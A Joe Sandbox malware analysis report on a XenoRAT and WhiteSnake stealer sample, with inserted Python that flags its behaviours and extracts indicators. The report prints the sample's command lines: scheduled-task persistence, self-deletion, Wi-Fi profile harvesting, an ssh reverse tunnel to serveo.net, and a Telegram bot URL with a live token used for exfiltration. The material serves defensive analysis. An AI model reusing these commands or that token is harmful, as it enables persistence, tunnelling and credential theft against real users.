Windows Analysis Report
0LpFv1haTA.exe
Overview
General Information
Sample name: | 0LpFv1haTA.exe (renamed because original name is a hash value) |
Original sample name: | 1bafb4856a31ae27271fbd2ee1574a4f.exe |
Analysis ID: | 1520806 |
MD5: | 1bafb4856a31ae27271fbd2ee1574a4f |
SHA1: | b8b3649d959524df2c4e8a94434fc0de90f95005 |
SHA256: | 91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff |
Tags: | exe, XenoRAT, user-abuse_ch |
Detection
WhiteSnake Stealer, XenoRAT
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected Telegram RAT
Yara detected WhiteSnake Stealer
Yara detected XenoRAT
.NET source code contains potential unpacker
.NET source code contains very large strings
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Self deletion via cmd or bat file
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Potentially Suspicious Malware Callback Communication
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses known network protocols on non-standard ports
Uses netsh to modify the Windows network and firewall settings
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Communication To Uncommon Destination Ports
Sigma detected: Port Forwarding Activity Via SSH.EXE
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Classification
- System is w10x64
- 0LpFv1haTA.exe (PID: 5948 cmdline: "C:\Users\user\Desktop\0LpFv1haTA.exe" MD5: 1BAFB4856A31AE27271FBD2EE1574A4F)
  - cmd.exe (PID: 5784 cmdline: "C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "0LpFv1haTA" /sc MINUTE /tr "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\user\Desktop\0LpFv1haTA.exe" &&START "" "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    - conhost.exe (PID: 3996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    - chcp.com (PID: 4996 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
    - timeout.exe (PID: 6104 cmdline: timeout /t 3 MD5: 100065E21CFBBDE57CBA2838921F84D6)
    - schtasks.exe (PID: 4288 cmdline: schtasks /create /tn "0LpFv1haTA" /sc MINUTE /tr "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    - 0LpFv1haTA.exe (PID: 1964 cmdline: "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe" MD5: 1BAFB4856A31AE27271FBD2EE1574A4F)
      - cmd.exe (PID: 7164 cmdline: "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        - conhost.exe (PID: 1680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        - chcp.com (PID: 2284 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
        - netsh.exe (PID: 7096 cmdline: netsh wlan show profiles MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
        - findstr.exe (PID: 5996 cmdline: findstr /R /C:"[ ]:[ ]" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
      - cmd.exe (PID: 5856 cmdline: "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        - conhost.exe (PID: 5620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        - chcp.com (PID: 2684 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
        - netsh.exe (PID: 2952 cmdline: netsh wlan show networks mode=bssid MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
        - findstr.exe (PID: 1976 cmdline: findstr "SSID BSSID Signal" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
      - ssh.exe (PID: 5856 cmdline: "ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:7634 serveo.net MD5: C05426E6F6DFB30FB78FBA874A2FF7DC)
        - conhost.exe (PID: 7124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      - manager.exe (PID: 8056 cmdline: "C:\Users\user\AppData\Roaming\manager.exe" MD5: DA118F70D089DABFAB1B43B4CD87DB65)
        - manager.exe (PID: 8128 cmdline: "C:\Users\user\AppData\Roaming\XenoManager\manager.exe" MD5: DA118F70D089DABFAB1B43B4CD87DB65)
          - schtasks.exe (PID: 7184 cmdline: "schtasks.exe" /Create /TN "mswindow" /XML "C:\Users\user\AppData\Local\Temp\tmp4A67.tmp" /F MD5: 48C2FE20575769DE916F48EF0676A965)
            - conhost.exe (PID: 2860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- 0LpFv1haTA.exe (PID: 5500 cmdline: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe MD5: 1BAFB4856A31AE27271FBD2EE1574A4F)
  - cmd.exe (PID: 3852 cmdline: "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    - conhost.exe (PID: 6196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    - chcp.com (PID: 5968 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
    - netsh.exe (PID: 744 cmdline: netsh wlan show profiles MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
    - findstr.exe (PID: 1520 cmdline: findstr /R /C:"[ ]:[ ]" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
  - cmd.exe (PID: 5300 cmdline: "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    - conhost.exe (PID: 5384 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    - chcp.com (PID: 5260 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
    - netsh.exe (PID: 5616 cmdline: netsh wlan show networks mode=bssid MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
    - findstr.exe (PID: 6196 cmdline: findstr "SSID BSSID Signal" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
  - ssh.exe (PID: 7232 cmdline: "ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:7634 serveo.net MD5: C05426E6F6DFB30FB78FBA874A2FF7DC)
    - conhost.exe (PID: 7240 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  - WerFault.exe (PID: 7488 cmdline: C:\Windows\system32\WerFault.exe -u -p 5500 -s 3644 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
- 0LpFv1haTA.exe (PID: 7992 cmdline: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe MD5: 1BAFB4856A31AE27271FBD2EE1574A4F)
- manager.exe (PID: 2108 cmdline: C:\Users\user\AppData\Roaming\XenoManager\manager.exe MD5: DA118F70D089DABFAB1B43B4CD87DB65)
- 0LpFv1haTA.exe (PID: 7388 cmdline: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe MD5: 1BAFB4856A31AE27271FBD2EE1574A4F)
- 0LpFv1haTA.exe (PID: 174540 cmdline: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe MD5: 1BAFB4856A31AE27271FBD2EE1574A4F)
- 0LpFv1haTA.exe (PID: 337928 cmdline: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe MD5: 1BAFB4856A31AE27271FBD2EE1574A4F)
- cleanup
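The process tree above carries, in plain command lines, the behaviours the signature list flags: a schtasks task with a one-minute trigger whose action lives under %LOCALAPPDATA%, a second task imported from an XML file in %TEMP%, Wi-Fi profile enumeration via netsh piped into findstr, an ssh.exe reverse port forward to serveo.net, and a cmd.exe that deletes its parent's image on the Desktop and relaunches the Starlabs copy. The Python below is an added example, not part of the Joe Sandbox report: it transcribes those command lines (parent PIDs follow the tree layout) as constructed input and runs simple regex heuristics over them. The rule names and folder list are this example's own approximations of the listed Sigma behaviours, not the Sigma rules themselves.

```python
"""Regex-based triage of a process tree: flags the persistence, credential
harvesting, tunnelling and self-deletion behaviours seen in the report above.
Added example; rule names are this example's own, not Sigma rule titles."""
import re
from typing import Dict, List, Optional, Tuple

# Constructed input: (pid, parent pid, command line) transcribed from the report's
# process tree. Parent PIDs follow the tree layout, not a separate telemetry source.
PROCESS_TREE: List[Tuple[int, int, str]] = [
    (5948, 0, r'"C:\Users\user\Desktop\0LpFv1haTA.exe"'),
    (5784, 5948, r'"C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && '
                 r'schtasks /create /tn "0LpFv1haTA" /sc MINUTE '
                 r'/tr "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe" /rl HIGHEST /f && '
                 r'DEL /F /S /Q /A "C:\Users\user\Desktop\0LpFv1haTA.exe" '
                 r'&&START "" "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe"'),
    (3996, 5784, r'C:\Windows\system32\conhost.exe 0xffffffff -ForceV1'),   # benign child
    (4288, 5784, r'schtasks /create /tn "0LpFv1haTA" /sc MINUTE '
                 r'/tr "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe" /rl HIGHEST /f'),
    (1964, 5784, r'"C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe"'),
    (7164, 1964, r'"cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"'),
    (7096, 7164, r'netsh wlan show profiles'),
    (5856, 1964, r'"ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:7634 serveo.net'),
    (7184, 8128, r'"schtasks.exe" /Create /TN "mswindow" /XML "C:\Users\user\AppData\Local\Temp\tmp4A67.tmp" /F'),
]

# Folders a standard user can write to; a task action or task XML here is suspect.
USER_WRITABLE = re.compile(r'\\Users\\[^\\]+\\AppData\\(?:Local|Roaming)\\|\\Temp\\|\\ProgramData\\', re.I)
# Path argument after /tr (task action) or /xml (task definition): quoted or bare.
SCHTASKS_PATH = re.compile(r'/(?:tr|xml)\s+(?:"([^"]+)"|(\S+))', re.I)
# Quoted .exe path after a DEL command, stopping at the next && or |.
DEL_TARGET = re.compile(r'\bdel\b[^&|]*?"([^"]+\.exe)"', re.I)


def image_of(cmdline: str) -> str:
    """First token of a command line: the quoted path if quoted, else up to the first space."""
    m = re.match(r'\s*(?:"([^"]+)"|(\S+))', cmdline)
    return (m.group(1) or m.group(2)) if m else ''


def ssh_reverse_forwards(cmdline: str) -> List[Tuple[str, str, str]]:
    """Return (remote_port, local_host, local_port) for every ssh -R spec.
    Accepts an optional bind address prefix; bracketed IPv6 literals are not handled."""
    out = []
    for spec in re.findall(r'\s-R\s+(\S+)', cmdline):   # -R is case-sensitive in ssh
        parts = spec.split(':')
        if len(parts) >= 3:
            out.append((parts[-3], parts[-2], parts[-1]))
    return out


def scan(cmdline: str, parent_cmdline: Optional[str]) -> List[str]:
    """Apply the heuristics to one command line; the parent is needed for self-deletion."""
    hits: List[str] = []
    low = cmdline.lower()
    if 'schtasks' in low and '/create' in low:
        m = SCHTASKS_PATH.search(cmdline)
        if m and USER_WRITABLE.search(m.group(1) or m.group(2)):
            hits.append('schtasks_user_writable_path')
        if re.search(r'/sc\s+minute\b', low):
            hits.append('schtasks_minute_interval')
    if re.search(r'netsh\s+wlan\s+show\s+profiles?', low):
        hits.append('wlan_profile_harvest')
    if re.search(r'\bssh(?:\.exe)?"?\s', low) and ssh_reverse_forwards(cmdline):
        hits.append('ssh_reverse_forward')
    d = DEL_TARGET.search(cmdline)
    if d:
        if re.search(r'\bstart\b', low):
            hits.append('delete_and_relaunch')
        if parent_cmdline and d.group(1).lower() == image_of(parent_cmdline).lower():
            hits.append('deletes_parent_image')
    return hits


def triage(tree: List[Tuple[int, int, str]]) -> Dict[int, List[str]]:
    """Map every PID with at least one finding to its list of findings."""
    by_pid = {pid: cmd for pid, _, cmd in tree}
    results: Dict[int, List[str]] = {}
    for pid, ppid, cmd in tree:
        hits = scan(cmd, by_pid.get(ppid))
        if hits:
            results[pid] = hits
    return results


if __name__ == '__main__':
    for pid, hits in sorted(triage(PROCESS_TREE).items()):
        print(pid, ', '.join(hits))
```

The cmd.exe launcher (PID 5784) fires on all four rules at once, which is the combination worth alerting on: a single command line that schedules a task, deletes the parent binary and starts the relocated copy. The conhost.exe child and the relaunched Starlabs copy itself produce no findings, so the heuristics key on arguments rather than on image names.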
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
XenoRAT | | No Attribution | | |
{"C2 url": "193.149.187.135", "Mutex Name": "Xeno_rat_nd8912d", "Install Folder": "appdata"}
{"C2 url": "https://api.telegram.org/bot7935489665:AAE2XyOo-0CSgW-NXoz80QphaaOkmebwR5Q/sendMessage"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_XenoRAT | Yara detected XenoRAT | Joe Security | ||
JoeSecurity_XenoRAT | Yara detected XenoRAT | Joe Security | ||
JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_XenoRAT | Yara detected XenoRAT | Joe Security | ||
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
JoeSecurity_WhiteSnake | Yara detected WhiteSnake Stealer | Joe Security | ||
JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security | ||
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_XenoRAT | Yara detected XenoRAT | Joe Security |
System Summary |
---|
Source: | Author: Jonathan Cheong, oscd.community: |
Source: | Author: Jonathan Cheong, oscd.community: |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems): |
Persistence and Installation Behavior |
---|
Source: | Author: Joe Security: |
Stealing of Sensitive Information |
---|
Source: | Author: Joe Security: |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-09-27T23:27:14.861894+0200 | 2050601 | 1 | A Network Trojan was detected | 192.168.2.5 | 49708 | 185.253.7.60 | 8080 | TCP |
2024-09-27T23:27:14.915873+0200 | 2050602 | 1 | A Network Trojan was detected | 192.168.2.5 | 49708 | 185.253.7.60 | 8080 | TCP |
2024-09-27T23:27:16.252698+0200 | 2050601 | 1 | A Network Trojan was detected | 192.168.2.5 | 49711 | 185.253.7.60 | 8080 | TCP |
2024-09-27T23:27:16.303924+0200 | 2050602 | 1 | A Network Trojan was detected | 192.168.2.5 | 49711 | 185.253.7.60 | 8080 | TCP |
2024-09-27T23:27:37.244014+0200 | 2045868 | 1 | Successful Credential Theft Detected | 192.168.2.5 | 49729 | 167.99.138.249 | 8080 | TCP |
2024-09-27T23:27:58.620125+0200 | 2045868 | 1 | Successful Credential Theft Detected | 192.168.2.5 | 49737 | 206.189.109.146 | 80 | TCP |
2024-09-27T23:27:59.523921+0200 | 2045868 | 1 | Successful Credential Theft Detected | 192.168.2.5 | 49738 | 45.82.65.63 | 80 | TCP |
2024-09-27T23:28:00.420730+0200 | 2045868 | 1 | Successful Credential Theft Detected | 192.168.2.5 | 49739 | 188.120.242.78 | 8817 | TCP |
2024-09-27T23:28:02.050959+0200 | 2045869 | 1 | A Network Trojan was detected | 192.168.2.5 | 49740 | 149.154.167.220 | 443 | TCP |
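The malware configuration and the Suricata alerts above are the two places the report exposes network indicators: a bare XenoRAT C2 address, a Telegram bot API URL carrying the bot token, and a set of destination IP/port pairs, several of them HTTP-style traffic on 8080 and 8817. The Python below is an added example, not part of the Joe Sandbox report: it parses both sources as transcribed from the page (constructed input), redacts the secret half of the Telegram token while keeping the numeric bot id, and groups the alerts by destination, flagging ports outside a small standard set. The standard-port set and the output format are this example's own choices.

```python
"""IOC extraction from a sandbox report's malware configuration and IDS alert
tables. Added example; the inputs are transcribed from the report above."""
import json
import re
from typing import Dict, List, Set
from urllib.parse import urlparse

# Constructed input: the two configuration records listed in the report.
CONFIG_LINES = [
    '{"C2 url": "193.149.187.135", "Mutex Name": "Xeno_rat_nd8912d", "Install Folder": "appdata"}',
    '{"C2 url": "https://api.telegram.org/bot7935489665:AAE2XyOo-0CSgW-NXoz80QphaaOkmebwR5Q/sendMessage"}',
]
# Constructed input: the Suricata rows above, in the report's column order
# (timestamp | SID | severity | classtype | src ip | src port | dst ip | dst port | proto).
SURICATA_ROWS = """\
2024-09-27T23:27:14.861894+0200 | 2050601 | 1 | A Network Trojan was detected | 192.168.2.5 | 49708 | 185.253.7.60 | 8080 | TCP
2024-09-27T23:27:14.915873+0200 | 2050602 | 1 | A Network Trojan was detected | 192.168.2.5 | 49708 | 185.253.7.60 | 8080 | TCP
2024-09-27T23:27:16.252698+0200 | 2050601 | 1 | A Network Trojan was detected | 192.168.2.5 | 49711 | 185.253.7.60 | 8080 | TCP
2024-09-27T23:27:16.303924+0200 | 2050602 | 1 | A Network Trojan was detected | 192.168.2.5 | 49711 | 185.253.7.60 | 8080 | TCP
2024-09-27T23:27:37.244014+0200 | 2045868 | 1 | Successful Credential Theft Detected | 192.168.2.5 | 49729 | 167.99.138.249 | 8080 | TCP
2024-09-27T23:27:58.620125+0200 | 2045868 | 1 | Successful Credential Theft Detected | 192.168.2.5 | 49737 | 206.189.109.146 | 80 | TCP
2024-09-27T23:27:59.523921+0200 | 2045868 | 1 | Successful Credential Theft Detected | 192.168.2.5 | 49738 | 45.82.65.63 | 80 | TCP
2024-09-27T23:28:00.420730+0200 | 2045868 | 1 | Successful Credential Theft Detected | 192.168.2.5 | 49739 | 188.120.242.78 | 8817 | TCP
2024-09-27T23:28:02.050959+0200 | 2045869 | 1 | A Network Trojan was detected | 192.168.2.5 | 49740 | 149.154.167.220 | 443 | TCP
"""

IPV4 = re.compile(r'^(\d{1,3}(?:\.\d{1,3}){3})(?::(\d+))?$')
# Telegram bot tokens are "<numeric bot id>:<35-char secret>" embedded in the API path.
TELEGRAM_TOKEN = re.compile(r'/bot(\d+):([A-Za-z0-9_-]{35})(?=/)')
STANDARD_TCP_PORTS = {80, 443}   # this example's choice of "expected" web ports


def redact_telegram_token(url: str) -> str:
    """Keep the numeric bot id (useful for abuse reports) and drop the secret half."""
    return TELEGRAM_TOKEN.sub(lambda m: f'/bot{m.group(1)}:<REDACTED>', url)


def config_iocs(lines: List[str]) -> List[Dict[str, str]]:
    """Turn each JSON config record into an IP or URL indicator."""
    iocs = []
    for line in lines:
        c2 = json.loads(line).get('C2 url', '')
        ip = IPV4.match(c2)
        if ip:
            iocs.append({'type': 'ip', 'value': ip.group(1), 'port': ip.group(2) or ''})
            continue
        parsed = urlparse(c2)
        ioc = {'type': 'url', 'value': redact_telegram_token(c2), 'host': parsed.hostname or ''}
        token = TELEGRAM_TOKEN.search(parsed.path)
        if parsed.hostname == 'api.telegram.org' and token:
            ioc['telegram_bot_id'] = token.group(1)
        iocs.append(ioc)
    return iocs


def suricata_iocs(rows: str) -> Dict[str, Dict[str, Set]]:
    """Group alerts by destination IP: ports seen, SIDs that fired, non-standard ports."""
    out: Dict[str, Dict[str, Set]] = {}
    for row in rows.strip().splitlines():
        cols = [c.strip() for c in row.split('|')]
        if len(cols) != 9:
            continue   # header, separator or truncated line
        _, sid, _, _, _, _, dst_ip, dst_port, _ = cols
        entry = out.setdefault(dst_ip, {'ports': set(), 'sids': set(), 'non_standard_ports': set()})
        port = int(dst_port)
        entry['ports'].add(port)
        entry['sids'].add(int(sid))
        if port not in STANDARD_TCP_PORTS:
            entry['non_standard_ports'].add(port)
    return out


def network_indicators() -> List[str]:
    """Flat, de-duplicated 'ip:port' list from both sources ('*' when no port is known)."""
    pairs = set()
    for ioc in config_iocs(CONFIG_LINES):
        if ioc['type'] == 'ip':
            pairs.add(f"{ioc['value']}:{ioc['port'] or '*'}")
    for ip, entry in suricata_iocs(SURICATA_ROWS).items():
        for port in entry['ports']:
            pairs.add(f'{ip}:{port}')
    return sorted(pairs)


if __name__ == '__main__':
    for ioc in config_iocs(CONFIG_LINES):
        print(ioc)
    print(network_indicators())
```

The only standard-port alert is the 443 flow to 149.154.167.220, an address in Telegram's 149.154.160.0/20 block, which lines up with the api.telegram.org URL in the configuration; the 8080 and 8817 destinations are what the report's "Uses known network protocols on non-standard ports" finding refers to. Sharing the redacted URL rather than the raw one avoids republishing a live bot token in an IOC feed.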
AV Detection |
---|
Source: | Avira: |
Source: | Avira: |
Source: | Malware Configuration Extractor: | ||
Source: | Malware Configuration Extractor: |
Source: | ReversingLabs: | ||
Source: | ReversingLabs: | ||
Source: | ReversingLabs: |
Source: | ReversingLabs: |
Source: | Integrated Neural Analysis Model: |
Source: | Joe Sandbox ML: | ||
Source: | Joe Sandbox ML: | ||
Source: | Joe Sandbox ML: |
Source: | Joe Sandbox ML: |
Source: | Code function: | 7_2_00007FF848F187D1 | |
Source: | Code function: | 13_2_00007FF848F187C1 | |
Source: | Code function: | 13_2_00007FF848F1890D |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
Source: | Static PE information: |
Source: | Binary string: |
Source: | Code function: | 0_2_00007FF848F05453 | |
Source: | Code function: | 7_2_00007FF848F1CD0F | |
Source: | Code function: | 7_2_00007FF848F165B0 | |
Source: | Code function: | 7_2_00007FF848F1E0C4 | |
Source: | Code function: | 7_2_00007FF848F1BB98 | |
Source: | Code function: | 7_2_00007FF848F216DF | |
Source: | Code function: | 7_2_00007FF848F1D59F | |
Source: | Code function: | 7_2_00007FF848F20459 | |
Source: | Code function: | 7_2_00007FF848F14894 | |
Source: | Code function: | 7_2_00007FF848F148F3 | |
Source: | Code function: | 7_2_00007FF848F1E37C | |
Source: | Code function: | 13_2_00007FF848F1BAE2 | |
Source: | Code function: | 13_2_00007FF848F2C135 | |
Source: | Code function: | 13_2_00007FF848F14141 | |
Source: | Code function: | 13_2_00007FF848F1615E | |
Source: | Code function: | 13_2_00007FF848F1B9ED | |
Source: | Code function: | 13_2_00007FF848F2E49A | |
Source: | Code function: | 13_2_00007FF848F1CC9E | |
Source: | Code function: | 13_2_00007FF848F1CC9E | |
Source: | Code function: | 13_2_00007FF848F21E8E | |
Source: | Code function: | 13_2_00007FF848F1DD70 | |
Source: | Code function: | 13_2_00007FF848F1DD70 | |
Source: | Code function: | 13_2_00007FF848F210BE | |
Source: | Code function: | 13_2_00007FF848F14F54 | |
Source: | Code function: | 13_2_00007FF848F232C9 | |
Source: | Code function: | 13_2_00007FF848F1D58F | |
Source: | Code function: | 13_2_00007FF848F17839 | |
Source: | Code function: | 13_2_00007FF848F14894 | |
Source: | Code function: | 13_2_00007FF848F1FFBF | |
Source: | Code function: | 40_2_00007FF848F26DD0 | |
Source: | Code function: | 40_2_00007FF848F27858 | |
Source: | Code function: | 40_2_00007FF848F24894 | |
Source: | Code function: | 40_2_00007FF848F248F3 | |
Source: | Code function: | 40_2_00007FF848F25792 | |
Source: | Code function: | 40_2_00007FF848F29BF6 | |
Source: | Code function: | 41_2_023B0B88 | |
Source: | Code function: | 42_2_03220B88 | |
Source: | Code function: | 42_2_03220B78 | |
Source: | Code function: | 45_2_00ED0B88 | |
Source: | Code function: | 46_2_00007FF848F34141 | |
Source: | Code function: | 46_2_00007FF848F34F54 | |
Source: | Code function: | 46_2_00007FF848F34894 | |
Source: | Code function: | 47_2_00007FF848F166FB | |
Source: | Code function: | 47_2_00007FF848F14141 | |
Source: | Code function: | 47_2_00007FF848F14F54 | |
Source: | Code function: | 47_2_00007FF848F14894 | |
Source: | Code function: | 47_2_00007FF848F19D36 | |
Source: | Code function: | 47_2_00007FF848F17979 | |
Source: | Code function: | 48_2_00007FF848F16F09 | |
Source: | Code function: | 48_2_00007FF848F14894 | |
Source: | Code function: | 48_2_00007FF848F148F3 | |
Source: | Code function: | 48_2_00007FF848F19D36 | |
Source: | Code function: | 48_2_00007FF848F17979 |
Networking |
---|
Source: | Suricata IDS: |
Source: | URLs: |
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: |
Source: | DNS query: |
Source: | File source: | ||
Source: | File source: |
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: |
Source: | HTTP traffic detected: |